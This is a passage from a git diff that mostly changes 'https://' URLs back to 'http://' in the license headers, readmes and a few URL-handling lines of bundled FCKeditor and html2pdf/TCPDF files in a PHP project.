https://www.gnu.org/licenses/gpl.html + http://www.gnu.org/licenses/gpl.html - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - https://www.gnu.org/licenses/lgpl.html + http://www.gnu.org/licenses/lgpl.html - Mozilla Public License Version 1.1 or later (the "MPL") - https://www.mozilla.org/MPL/MPL-1.1.html + http://www.mozilla.org/MPL/MPL-1.1.html == END LICENSE == diff --git a/admin/FCKeditor/fckeditor_php4.php b/admin/FCKeditor/fckeditor_php4.php index 979d672..d29bf5b 100755 --- a/admin/FCKeditor/fckeditor_php4.php +++ b/admin/FCKeditor/fckeditor_php4.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor_php5.php b/admin/FCKeditor/fckeditor_php5.php index 73a5a2b..d0dc3cb 100755 --- a/admin/FCKeditor/fckeditor_php5.php +++ b/admin/FCKeditor/fckeditor_php5.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckpackager.xml b/admin/FCKeditor/fckpackager.xml index aa2808f..3cae595 100755 --- a/admin/FCKeditor/fckpackager.xml +++ b/admin/FCKeditor/fckpackager.xml @@ -1,6 +1,6 @@ <?xml version="1.0" encoding="utf-8" ?> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,24 +9,24 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * This is the configuration file to be used with FCKpackager to generate the * compressed code files in the "js" folder. * - * Please check https://www.fckeditor.net for more info. + * Please check http://www.fckeditor.net for more info. --> <Package> <Header><![CDATA[/* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -35,13 +35,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckstyles.xml b/admin/FCKeditor/fckstyles.xml index b114fc7..bfd80e7 100755 --- a/admin/FCKeditor/fckstyles.xml +++ b/admin/FCKeditor/fckstyles.xml @@ -1,6 +1,6 @@ <?xml version="1.0" encoding="utf-8" ?> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fcktemplates.xml b/admin/FCKeditor/fcktemplates.xml index 0a8083a..8761062 100755 --- a/admin/FCKeditor/fcktemplates.xml +++ b/admin/FCKeditor/fcktemplates.xml @@ -1,6 +1,6 @@ <?xml version="1.0" encoding="utf-8" ?> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/htaccess.txt b/admin/FCKeditor/htaccess.txt index 53bbc30..1261b7f 100755 --- a/admin/FCKeditor/htaccess.txt +++ b/admin/FCKeditor/htaccess.txt @@ -1,5 +1,5 @@ # -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -8,13 +8,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/license.txt b/admin/FCKeditor/license.txt index d46628d..edcb16d 100755 --- a/admin/FCKeditor/license.txt +++ b/admin/FCKeditor/license.txt @@ -1,19 +1,19 @@ -FCKeditor - The text editor for Internet - https://www.fckeditor.net +FCKeditor - The text editor for Internet - http://www.fckeditor.net Copyright (C) 2003-2007 Frederico Caldeira Knabben Licensed under the terms of any of the following licenses at your choice: - GNU General Public License Version 2 or later (the "GPL") - https://www.gnu.org/licenses/gpl.html + http://www.gnu.org/licenses/gpl.html (See Appendix A) - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - https://www.gnu.org/licenses/lgpl.html + http://www.gnu.org/licenses/lgpl.html (See Appendix B) - Mozilla Public License Version 1.1 or later (the "MPL") - https://www.mozilla.org/MPL/MPL-1.1.html + http://www.mozilla.org/MPL/MPL-1.1.html (See Appendix C) You are not required to, but if you want to explicitly declare the @@ -1214,7 +1214,7 @@ EXHIBIT A -Mozilla Public License. ``The contents of this file are subject to the Mozilla Public License Version 1.1 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at - https://www.mozilla.org/MPL/ + http://www.mozilla.org/MPL/ Software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the diff --git a/html2pdf_v4.03/_LGPL.txt b/html2pdf_v4.03/_LGPL.txt index 57e3534..2f20b2a 100755 --- a/html2pdf_v4.03/_LGPL.txt +++ b/html2pdf_v4.03/_LGPL.txt @@ -1,7 +1,7 @@ GNU LESSER GENERAL PUBLIC LICENSE Version 3, 29 June 2007 - Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/> + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. diff --git a/html2pdf_v4.03/_class/parsingCss.class.php b/html2pdf_v4.03/_class/parsingCss.class.php index 1c2f3f1..2583d8f 100755 --- a/html2pdf_v4.03/_class/parsingCss.class.php +++ b/html2pdf_v4.03/_class/parsingCss.class.php @@ -1770,16 +1770,16 @@ class HTML2PDF_parsingCss // get the content of the css file $content = @file_get_contents($url); - // if "https://" in the url - if (strpos($url, 'https://')!==false) { + // if "http://" in the url + if (strpos($url, 'http://')!==false) { - // get the domain "https://xxx/" - $url = str_replace('https://', '', $url); + // get the domain "http://xxx/" + $url = str_replace('http://', '', $url); $url = explode('/', $url); - $urlMain = 'https://'.$url[0].'/'; + $urlMain = 'http://'.$url[0].'/'; // get the absolute url of the path - $urlSelf = $url; unset($urlSelf[count($urlSelf)-1]); $urlSelf = 'https://'.implode('/', $urlSelf).'/'; + $urlSelf = $url; unset($urlSelf[count($urlSelf)-1]); $urlSelf = 'http://'.implode('/', $urlSelf).'/'; // adapt the url in the css content $content = preg_replace('/url\(([^\\\\][^)]*)\)/isU', 'url('.$urlSelf.'$1)', $content); diff --git a/html2pdf_v4.03/_class/tcpdfConfig.php b/html2pdf_v4.03/_class/tcpdfConfig.php index ab5166a..f0027a5 100755 --- a/html2pdf_v4.03/_class/tcpdfConfig.php +++ b/html2pdf_v4.03/_class/tcpdfConfig.php @@ -25,8 +25,8 @@ * Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com * @package com.tecnick.tcpdf * @version 4.0.014 - * @link https://tcpdf.sourceforge.net - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://tcpdf.sourceforge.net + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2004-10-27 */ @@ -67,14 +67,14 @@ if (!defined('K_TCPDF_EXTERNAL_CONFIG')) { if (isset($_SERVER['HTTPS']) AND (!empty($_SERVER['HTTPS'])) AND strtolower($_SERVER['HTTPS'])!='off') { $kPathUrl = 'https://'; } else { - $kPathUrl = 'https://'; + $kPathUrl = 'http://'; } $kPathUrl .= $_SERVER['HTTP_HOST']; $kPathUrl .= str_replace('\\', '/', substr(K_PATH_MAIN, (strlen($_SERVER['DOCUMENT_ROOT']) - 1))); } /** - * URL path to tcpdf installation folder (https://localhost/tcpdf/). + * URL path to tcpdf installation folder (http://localhost/tcpdf/). * By default it is automatically calculated but you can also set it as a fixed string to improve performances. */ define('K_PATH_URL', $kPathUrl); diff --git a/html2pdf_v4.03/_lisez_moi.txt b/html2pdf_v4.03/_lisez_moi.txt index 6bd9446..fe9d03f 100755 --- a/html2pdf_v4.03/_lisez_moi.txt +++ b/html2pdf_v4.03/_lisez_moi.txt @@ -1,7 +1,7 @@ ******************************************************* ** Ce programme est distribué sous la licence LGPL, ** ** reportez-vous au fichier _LGPL.txt ou à ** -** https://www.gnu.org/licenses/lgpl.html ** +** http://www.gnu.org/licenses/lgpl.html ** ** pour en savoir plus. ** ** ** ** Copyright 2008-2011 par Laurent Minguet ** @@ -59,7 +59,7 @@ Utilisation : * <qrcode></qrcode> (CF Exemple 13 & wiki) permet d'insérer un codebar à 2 dimensions de type QRcode - (QR Code is registered trademark of DENSO WAVE INCORPORATED | https://www.denso-wave.com/qrcode/) + (QR Code is registered trademark of DENSO WAVE INCORPORATED | http://www.denso-wave.com/qrcode/) * <bookmark></bookmark> (CF Exemples 7 & About & wiki) permet d'insérer des bookmarks dans les pdfs, CF Exemple 7 et About. @@ -83,9 +83,9 @@ Informations : ------------- Programmeur : Spipu email : webmaster@html2pdf.fr - site : https://html2pdf.fr/ - wiki : https://html2pdf.fr/fr/wiki - support : https://html2pdf.fr/fr/forum + site : http://html2pdf.fr/ + wiki : http://html2pdf.fr/fr/wiki + support : http://html2pdf.fr/fr/forum Remerciement : ------------- diff --git a/html2pdf_v4.03/_read_me.txt b/html2pdf_v4.03/_read_me.txt index a199903..69a17da 100755 --- a/html2pdf_v4.03/_read_me.txt +++ b/html2pdf_v4.03/_read_me.txt @@ -1,7 +1,7 @@ ********************************************************* ** This program is distributed under the LGPL License, ** ** for more information see file _LGPL.txt or ** -** https://www.gnu.org/licenses/lgpl.html ** +** http://www.gnu.org/licenses/lgpl.html ** ** ** ** Copyright 2008-2011 by Laurent Minguet ** ********************************************************* @@ -57,7 +57,7 @@ How to use : * <qrcode></qrcode> (CF Example 13 & wiki) can insert QRcode 2D barcodes - (QR Code is registered trademark of DENSO WAVE INCORPORATED | https://www.denso-wave.com/qrcode/) + (QR Code is registered trademark of DENSO WAVE INCORPORATED | http://www.denso-wave.com/qrcode/) * <bookmark></bookmark> (CF Examples 7 & About & wiki) can insert bookmark in pdfs, CF Example 7 and About. @@ -70,7 +70,7 @@ How to use : change log : ----------- - see on this page : https://html2pdf.fr/en/download + see on this page : http://html2pdf.fr/en/download Help & Support : --------------- @@ -81,9 +81,9 @@ Informations : ------------- Programmer : Spipu email : webmaster@html2pdf.fr - web site : https://html2pdf.fr/ - wiki : https://html2pdf.fr/en/wiki - support : https://html2pdf.fr/en/forum + web site : http://html2pdf.fr/ + wiki : http://html2pdf.fr/en/wiki + support : http://html2pdf.fr/en/forum Thanks : ------- diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/2dbarcodes.php b/html2pdf_v4.03/_tcpdf_5.0.002/2dbarcodes.php index e944051..79829ee 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/2dbarcodes.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/2dbarcodes.php @@ -4,7 +4,7 @@ // Begin : 2009-04-07 // Last Update : 2010-04-30 // Version : 1.0.003 -// License : GNU LGPL (https://www.gnu.org/copyleft/lesser.html) +// License : GNU LGPL (http://www.gnu.org/copyleft/lesser.html) // ---------------------------------------------------------------------------- // Copyright (C) 2008-2009 Nicola Asuni - Tecnick.com S.r.l. // @@ -19,7 +19,7 @@ // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License -// along with this program. If not, see <https://www.gnu.org/licenses/>. +// along with this program. If not, see <http://www.gnu.org/licenses/>. // // See LICENSE.TXT file for more information. // ---------------------------------------------------------------------------- @@ -45,19 +45,19 @@ * @abstract Functions for generating string representation of 2D barcodes. * @author Nicola Asuni * @copyright 2008-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @version 1.0.003 */ /** - * PHP class to creates array representations for 2D barcodes to be used with TCPDF (https://www.tcpdf.org).<br> + * PHP class to creates array representations for 2D barcodes to be used with TCPDF (http://www.tcpdf.org).<br> * @name TCPDFBarcode * @package com.tecnick.tcpdf * @version 1.0.003 * @author Nicola Asuni - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL */ class TCPDF2DBarcode { diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/CHANGELOG.TXT b/html2pdf_v4.03/_tcpdf_5.0.002/CHANGELOG.TXT index 15ab41d..cb1b454 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/CHANGELOG.TXT +++ b/html2pdf_v4.03/_tcpdf_5.0.002/CHANGELOG.TXT @@ -1158,12 +1158,12 @@ 2.2.004 (2008-03-04) - Several examples were added. - AddPage() Header() and Footer() were fixed. - - Documentation is now available on https://www.tcpdf.org + - Documentation is now available on http://www.tcpdf.org 2.2.003 (2008-03-03) - [1894853] Performance of MultiCell() was improved. - RadioButton and ListBox functions were added. - - javascript form functions were rewritten and properties names are changed. The properties function supported by form fields are listed on Possible values are listed on https://www.adobe.com/devnet/acrobat/pdfs/js_developer_guide.pdf. + - javascript form functions were rewritten and properties names are changed. The properties function supported by form fields are listed on Possible values are listed on http://www.adobe.com/devnet/acrobat/pdfs/js_developer_guide.pdf. 2.2.002 (2008-02-28) - [1900495] html images path was fixed. @@ -1378,7 +1378,7 @@ 1.53.0.TC004 (2005-01-04) - this changelog were added. - removed commercial fonts for licensing issue. - - Bitstream Vera Fonts were added (https://www.bitstream.com/font_rendering/products/dev_fonts/vera.html). + - Bitstream Vera Fonts were added (http://www.bitstream.com/font_rendering/products/dev_fonts/vera.html). - Now the AddFont and SetFont functions returns the basic font if the styled version do not exist. EOF ---------------------------------------------------------------------------- diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/README.TXT b/html2pdf_v4.03/_tcpdf_5.0.002/README.TXT index c8bd08b..d45873c 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/README.TXT +++ b/html2pdf_v4.03/_tcpdf_5.0.002/README.TXT @@ -3,7 +3,7 @@ TCPDF - README IF YOU'D LIKE TO SUPPORT TCPDF, PLEASE CONSIDER MAKING A DONATION: -https://sourceforge.net/donate/index.php?group_id=128076 +http://sourceforge.net/donate/index.php?group_id=128076 ------------------------------------------------------------ @@ -21,12 +21,12 @@ Copyright (c) 2001-2010: www.tecnick.com URLs: - https://www.tcpdf.org - https://www.sourceforge.net/projects/tcpdf + http://www.tcpdf.org + http://www.sourceforge.net/projects/tcpdf Description: TCPDF is a PHP class for generating PDF files on-the-fly without requiring external extensions. - TCPDF has been originally derived from the Public Domain FPDF class by Olivier Plathey (https://www.fpdf.org). + TCPDF has been originally derived from the Public Domain FPDF class by Olivier Plathey (http://www.fpdf.org). Main Features: // * no external libraries are required for the basic functions; @@ -35,7 +35,7 @@ Main Features: // * TrueTypeUnicode, OpenTypeUnicode, TrueType, OpenType, Type1 and CID-0 fonts; // * methods to publish some XHTML code, Javascript and Forms; // * images, graphic (geometric figures) and transformation methods; -// * supports JPEG, PNG and SVG images natively, all images supported by GD (GD, GD2, GD2PART, GIF, JPEG, PNG, BMP, XBM, XPM) and all images supported via ImagMagick (https://www.imagemagick.org/www/formats.html) +// * supports JPEG, PNG and SVG images natively, all images supported by GD (GD, GD2, GD2PART, GIF, JPEG, PNG, BMP, XBM, XPM) and all images supported via ImagMagick (http://www.imagemagick.org/www/formats.html) // * 1D and 2D barcodes: CODE 39, ANSI MH10.8M-1983, USD-3, 3 of 9, CODE 93, USS-93, Standard 2 of 5, Interleaved 2 of 5, CODE 128 A/B/C, 2 and 5 Digits UPC-Based Extention, EAN 8, EAN 13, UPC-A, UPC-E, MSI, POSTNET, PLANET, RMS4CC (Royal Mail 4-state Customer Code), CBC (Customer Bar Code), KIX (Klant index - Customer index), Intelligent Mail Barcode, Onecode, USPS-B-3200, CODABAR, CODE 11, PHARMACODE, PHARMACODE TWO-TRACKS, QR-Code; // * Grayscale, RGB, CMYK, Spot Colors and Transparencies; // * automatic page header and footer management; @@ -52,7 +52,7 @@ Main Features: // * page compression (requires php-zlib extension); -Installation (full instructions on https://www.tcpdf.org): +Installation (full instructions on http://www.tcpdf.org): 1. copy the folder on your Web server 2. set your installation path and other parameters on the config/tcpdf_config.php 3. call the examples/example_001.php page with your browser to see an example @@ -61,7 +61,7 @@ Source Code Documentation: doc/index.html For Additional Documentation: - https://www.tcpdf.org + http://www.tcpdf.org License Copyright (C) 2002-2010 Nicola Asuni - Tecnick.com S.r.l. @@ -77,7 +77,7 @@ License GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License - along with this program. If not, see <https://www.gnu.org/licenses/>. + along with this program. If not, see <http://www.gnu.org/licenses/>. See LICENSE.TXT file for more information. diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/barcodes.php b/html2pdf_v4.03/_tcpdf_5.0.002/barcodes.php index 9033726..38e985d 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/barcodes.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/barcodes.php @@ -4,7 +4,7 @@ // Begin : 2008-06-09 // Last Update : 2009-08-26 // Version : 1.0.009 -// License : GNU LGPL (https://www.gnu.org/copyleft/lesser.html) +// License : GNU LGPL (http://www.gnu.org/copyleft/lesser.html) // ---------------------------------------------------------------------------- // Copyright (C) 2008-2009 Nicola Asuni - Tecnick.com S.r.l. // @@ -19,7 +19,7 @@ // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License -// along with this program. If not, see <https://www.gnu.org/licenses/>. +// along with this program. If not, see <http://www.gnu.org/licenses/>. // // See LICENSE.TXT file for more information. // ---------------------------------------------------------------------------- @@ -45,19 +45,19 @@ * @abstract Functions for generating string representation of common 1D barcodes. * @author Nicola Asuni * @copyright 2008-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @version 1.0.008 */ /** - * PHP class to creates array representations for common 1D barcodes to be used with TCPDF (https://www.tcpdf.org).<br> + * PHP class to creates array representations for common 1D barcodes to be used with TCPDF (http://www.tcpdf.org).<br> * @name TCPDFBarcode * @package com.tecnick.tcpdf * @version 1.0.008 * @author Nicola Asuni - * @link https://www.tcpdf.org - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://www.tcpdf.org + * @license http://www.gnu.org/copyleft/lesser.html LGPL */ class TCPDFBarcode { @@ -1716,7 +1716,7 @@ class TCPDFBarcode { * IMB - Intelligent Mail Barcode - Onecode - USPS-B-3200 * (requires PHP bcmath extension) * Intelligent Mail barcode is a 65-bar code for use on mail in the United States. - * The fields are described as follows:<ul><li>The Barcode Identifier shall be assigned by USPS to encode the presort identification that is currently printed in human readable form on the optional endorsement line (OEL) as well as for future USPS use. This shall be two digits, with the second digit in the range of 0–4. The allowable encoding ranges shall be 00–04, 10–14, 20–24, 30–34, 40–44, 50–54, 60–64, 70–74, 80–84, and 90–94.</li><li>The Service Type Identifier shall be assigned by USPS for any combination of services requested on the mailpiece. The allowable encoding range shall be 000https://it2.php.net/manual/en/function.dechex.php–999. Each 3-digit value shall correspond to a particular mail class with a particular combination of service(s). Each service program, such as OneCode Confirm and OneCode ACS, shall provide the list of Service Type Identifier values.</li><li>The Mailer or Customer Identifier shall be assigned by USPS as a unique, 6 or 9 digit number that identifies a business entity. The allowable encoding range for the 6 digit Mailer ID shall be 000000- 899999, while the allowable encoding range for the 9 digit Mailer ID shall be 900000000-999999999.</li><li>The Serial or Sequence Number shall be assigned by the mailer for uniquely identifying and tracking mailpieces. The allowable encoding range shall be 000000000–999999999 when used with a 6 digit Mailer ID and 000000-999999 when used with a 9 digit Mailer ID. e. The Delivery Point ZIP Code shall be assigned by the mailer for routing the mailpiece. This shall replace POSTNET for routing the mailpiece to its final delivery point. The length may be 0, 5, 9, or 11 digits. The allowable encoding ranges shall be no ZIP Code, 00000–99999, 000000000–999999999, and 00000000000–99999999999.</li></ul> + * The fields are described as follows:<ul><li>The Barcode Identifier shall be assigned by USPS to encode the presort identification that is currently printed in human readable form on the optional endorsement line (OEL) as well as for future USPS use. This shall be two digits, with the second digit in the range of 0–4. The allowable encoding ranges shall be 00–04, 10–14, 20–24, 30–34, 40–44, 50–54, 60–64, 70–74, 80–84, and 90–94.</li><li>The Service Type Identifier shall be assigned by USPS for any combination of services requested on the mailpiece. The allowable encoding range shall be 000http://it2.php.net/manual/en/function.dechex.php–999. Each 3-digit value shall correspond to a particular mail class with a particular combination of service(s). Each service program, such as OneCode Confirm and OneCode ACS, shall provide the list of Service Type Identifier values.</li><li>The Mailer or Customer Identifier shall be assigned by USPS as a unique, 6 or 9 digit number that identifies a business entity. The allowable encoding range for the 6 digit Mailer ID shall be 000000- 899999, while the allowable encoding range for the 9 digit Mailer ID shall be 900000000-999999999.</li><li>The Serial or Sequence Number shall be assigned by the mailer for uniquely identifying and tracking mailpieces. The allowable encoding range shall be 000000000–999999999 when used with a 6 digit Mailer ID and 000000-999999 when used with a 9 digit Mailer ID. e. The Delivery Point ZIP Code shall be assigned by the mailer for routing the mailpiece. This shall replace POSTNET for routing the mailpiece to its final delivery point. The length may be 0, 5, 9, or 11 digits. The allowable encoding ranges shall be no ZIP Code, 00000–99999, 000000000–999999999, and 00000000000–99999999999.</li></ul> * @param string $code code to print, separate the ZIP (routing code) from the rest using a minus char '-' (BarcodeID_ServiceTypeID_MailerID_SerialNumber-RoutingCode) * @return array barcode representation. * @access protected diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/cache/utf8test.txt b/html2pdf_v4.03/_tcpdf_5.0.002/cache/utf8test.txt index d73026f..27cddb1 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/cache/utf8test.txt +++ b/html2pdf_v4.03/_tcpdf_5.0.002/cache/utf8test.txt @@ -1,7 +1,7 @@ Sentences that contain all letters commonly used in a language -------------------------------------------------------------- -Markus Kuhn <https://www.cl.cam.ac.uk/~mgk25/> -- 2001-09-02 +Markus Kuhn <http://www.cl.cam.ac.uk/~mgk25/> -- 2001-09-02 This file is UTF-8 encoded. diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/bra.php b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/bra.php index 6d4e23c..df9a56f 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/bra.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/bra.php @@ -25,8 +25,8 @@ * @abstract TCPDF language file. * @author Nicola Asuni * @copyright 2004-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://tcpdf.sourceforge.net - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://tcpdf.sourceforge.net + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2004-03-03 */ diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/eng.php b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/eng.php index add3ff6..312782a 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/eng.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/eng.php @@ -25,8 +25,8 @@ * @abstract TCPDF language file. * @author Nicola Asuni * @copyright 2004-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://tcpdf.sourceforge.net - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://tcpdf.sourceforge.net + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2004-03-03 */ diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ger.php b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ger.php index 0452a9b..72a9372 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ger.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ger.php @@ -25,8 +25,8 @@ * @abstract TCPDF language file. * @author Nicola Asuni * @copyright 2004-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://tcpdf.sourceforge.net - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://tcpdf.sourceforge.net + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2004-03-03 */ diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ita.php b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ita.php index 0d51dc2..041f8a0 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ita.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/config/lang/ita.php @@ -25,8 +25,8 @@ * @abstract TCPDF language file. * @author Nicola Asuni * @copyright 2004-2009 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com - * @link https://tcpdf.sourceforge.net - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://tcpdf.sourceforge.net + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2004-03-03 */ diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config.php b/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config.php index 64afe7a..b95c710 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config.php @@ -24,8 +24,8 @@ * @copyright 2004-2010 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - 